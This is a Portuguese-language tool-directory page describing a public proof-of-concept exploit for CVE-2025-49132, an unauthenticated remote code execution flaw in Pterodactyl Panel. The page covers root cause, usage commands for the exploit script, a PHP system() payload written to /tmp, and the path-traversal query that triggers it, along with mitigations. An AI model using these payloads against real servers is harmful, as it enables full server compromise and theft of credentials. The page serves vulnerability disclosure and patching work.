Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE- — Exploit de PoC para CVE-2025-49132 (GHSA-24wv-6c99-f843) – Execução Remota de Código não autenticada no Pterodactyl Panel ≤ 1.11.10 | Kitploit
Ferramentas/GitHubGitHub/dollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubdollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-

CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE-

Exploit de PoC para CVE-2025-49132 (GHSA-24wv-6c99-f843) – Execução Remota de Código não autenticada no Pterodactyl Panel ≤ 1.11.10

Ver RepositórioSite
31há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-49132

Pterodactyl Panel - Execução Remota de Código Não Autenticada (RCE)


🔎 Resumo

CVE‑2025‑49132 é uma vulnerabilidade crítica de Execução Remota de Código que afeta Pterodactyl Panel <= 1.11.10.

Um atacante não autenticado pode explorar a validação inadequada de entrada no endpoint /locales/locale.json para executar comandos arbitrários do sistema.

Corrigido na versão: 1.11.11


📌 Impacto

A exploração bem-sucedida permite:

  • Execução Remota de Código Não Autenticada
  • Leitura de arquivos sensíveis (ex.: .env)
  • Extração de credenciais de banco de dados
  • Comprometimento total do servidor

Gravidade: Crítica


🧠 Causa Raiz

A vulnerabilidade existe devido à validação inadequada de:

  • parâmetro locale
  • parâmetro namespace

Um atacante pode:

  1. Abusar da travessia de diretório (../../../../../)
  2. Explorar o config-create
  3. Gravar payloads PHP arbitrários em /tmp
  4. Acionar a execução por meio de carregamento de namespace manipulado

Classificação da fraqueza: CWE-94 -- Controle Impróprio da Geração de Código


🚀 Prova de Conceito (PoC)

Uso

root@kitploit:~
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]

Exemplos

root@kitploit:~
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR

Caminho padrão:

root@kitploit:~
/usr/share/php/PEAR

Obtenha o caminho correto na página /phpinfo.php alt text


🛠 Fluxo de Exploração

Passo 1 - Gravar o Payload

O atacante injeta um payload PHP malicioso em /tmp/payload.php usando:

root@kitploit:~
/<?=system('id')?>+/tmp/payload.php

Passo 2 --- Acionar a Execução

Ao chamar:

root@kitploit:~
?locale=../../../../../tmp&namespace=payload

O servidor executa o PHP injetado.

alt text

🛡 Mitigação

  • Atualize para Pterodactyl Panel >= 1.11.11
  • Sanitize as entradas locale e namespace
  • Desative funções PHP perigosas
  • Restrinja a exposição desnecessária de endpoints

📚 Referências

  • Aviso do GitHub: GHSA-24wv-6c99-f843
  • CVE-2025-49132
  • Commit do Patch v1.11.11 do Pterodactyl Panel

Baixar ferramenta